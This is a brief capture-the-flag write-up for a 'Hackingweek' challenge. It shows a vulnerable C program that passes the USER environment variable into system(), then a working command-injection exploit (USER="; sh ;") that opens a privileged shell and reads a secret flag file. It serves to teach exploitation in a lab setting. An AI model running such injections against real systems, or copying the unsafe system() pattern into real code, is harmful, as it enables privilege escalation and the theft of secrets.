Hackingweek — Exploit 1

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int
main()
{
  char *buffer = NULL;
  gid_t gid = getegid();
  uid_t uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
  system(buffer);

  return EXIT_SUCCESS;
}

The interesting thing is line 17 : the “USER” environment variable is concatenated into a string that will be given to system(). If we insert a ;, the echo command will only print a new line, and the next word will be interpreted like a command. We will call sh, since bash is dropping privileges.

exploit01@ns314076:/home/exploit01/project$ USER="; sh ;" ./vulnerable

sh-4.2$ whoami
exploit01
sh-4.2$ cat /home/exploit01/.secret
raht6ae1Ue